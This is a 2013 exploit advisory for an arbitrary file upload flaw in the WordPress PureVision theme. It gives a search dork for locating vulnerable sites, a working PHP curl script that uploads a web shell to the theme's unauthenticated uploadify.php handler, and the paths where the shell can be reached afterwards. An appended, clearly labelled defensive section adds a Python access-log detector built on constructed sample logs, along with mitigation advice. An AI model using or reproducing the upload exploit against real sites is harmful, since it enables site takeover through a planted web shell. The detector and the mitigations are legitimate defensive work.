Wordpress PureVision Theme Arbitrary File Upload Vulnerability
#Title : Wordpress PureVision Theme Arbitrary File Upload
#Author : r0seMary
#Date : 14/10/13 - 14 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themeforest.net
#Download : http://themeforest.net/item/purevision-wordpress-theme/156538
#Greetz : Sanja07 | J3JU | GOBER | Panda404 | Agam Bastard | IDVisioNs | Mr_Cihuy | 0KaL
#Thanks : Damn Security
#Tested : Mozilla, Chrome -> Windows
#Vulnerability : Arbitrary File Upload
#Dork : inurl:wp-content/themes/purevision
==================================================================
<?php
$uploadfile="shellname.php";
$ch = curl_init("http://site.com/wordpress_path/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access ->
http://site.com/wordpress_path/wp-content/themes/purevision/scripts/admin/uploadify/shellname.php
or
http://site.com/wordpress_path/wp-content/uploads/[year]/[month]/ -> find your shell
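For defenders, an added detection example that is not part of the original advisory: it scans web-server access-log lines in the Apache/nginx "combined" format for the two observable halves of the abuse described above, an unauthenticated POST to the theme's bundled uploadify.php endpoint, and any later request for a server-side script from a directory that should only serve static files (the uploadify directory itself and wp-content/uploads/, the two locations the advisory names). The endpoint path is the one quoted above; the log lines, timestamps and client addresses are constructed sample data, and the finding names and severity scheme are this example's own.

```python
"""Detect the PureVision/Uploadify upload-abuse pattern in web-server access logs.

Added defensive example; not part of the original advisory. Assumes the Apache/nginx
"combined" log format and the theme endpoint path quoted in the advisory.
"""
import re
from typing import Dict, List, Optional

# Combined log format: client IP, identd, user, [timestamp], "request line", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# Upload handler bundled with the theme (path from the advisory, relative to the site root).
UPLOADIFY_ENDPOINT = "/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php"

# Directories that should only ever serve static content; a server-side script
# being requested from either of them is the post-upload half of the pattern.
STATIC_ONLY_DIRS = (
    "/wp-content/uploads/",
    "/wp-content/themes/purevision/scripts/admin/uploadify/",
)

# Extensions a PHP-enabled server may execute. The trailing group also catches
# double extensions such as "x.php.jpg", which some Apache setups still hand to PHP.
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)(?:[./]|$)", re.IGNORECASE)

# Constructed sample log (RFC 5737 documentation addresses; not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Nov/2013:05:18:01 +0000] "GET /wp-content/themes/purevision/style.css HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Nov/2013:05:18:07 +0000] "POST /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 58 "-" "curl/7.33.0"
203.0.113.5 - - [14/Nov/2013:05:18:09 +0000] "GET /wp-content/themes/purevision/scripts/admin/uploadify/shellname.php HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Nov/2013:05:20:00 +0000] "GET /wp-content/uploads/2013/11/photo.jpg HTTP/1.1" 200 30211 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Nov/2013:05:21:00 +0000] "GET /wp-content/uploads/2013/11/image.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = entry["path"].split("?", 1)[0]  # match on the path only, not the query
    return entry


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Map one request to a finding kind, or None when it is ordinary traffic."""
    path = entry["path"]
    if entry["method"] == "POST" and path.endswith(UPLOADIFY_ENDPOINT):
        return "upload-endpoint-post"
    in_static_dir = any(d in path for d in STATIC_ONLY_DIRS)
    # The bundled handler itself lives in the uploadify directory; a GET to it is
    # not the post-upload half of the pattern, so it is excluded here.
    if in_static_dir and SCRIPT_EXT_RE.search(path) and not path.endswith(UPLOADIFY_ENDPOINT):
        return "script-in-static-dir"
    return None


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line, in log order."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind:
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "path": entry["path"], "kind": kind})
    return findings


def correlate(findings: List[Dict[str, str]]) -> Dict[str, str]:
    """Rate each client: both halves of the pattern -> high, script fetch alone -> medium."""
    kinds_by_ip: Dict[str, set] = {}
    for f in findings:
        kinds_by_ip.setdefault(f["ip"], set()).add(f["kind"])
    rating = {}
    for ip, kinds in kinds_by_ip.items():
        if {"upload-endpoint-post", "script-in-static-dir"} <= kinds:
            rating[ip] = "high"
        elif "script-in-static-dir" in kinds:
            rating[ip] = "medium"
        else:
            rating[ip] = "low"
    return rating


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['kind']:22} {f['path']}")
    print(correlate(found))
```

The matching mitigation follows from the PoC itself: it sends no cookie, so the bundled handler accepts uploads without any WordPress session and should be removed or placed behind authentication, and the web server should refuse to execute .php under wp-content/uploads/ and under the theme's uploadify directory, so that a file which does land there is served as text rather than run.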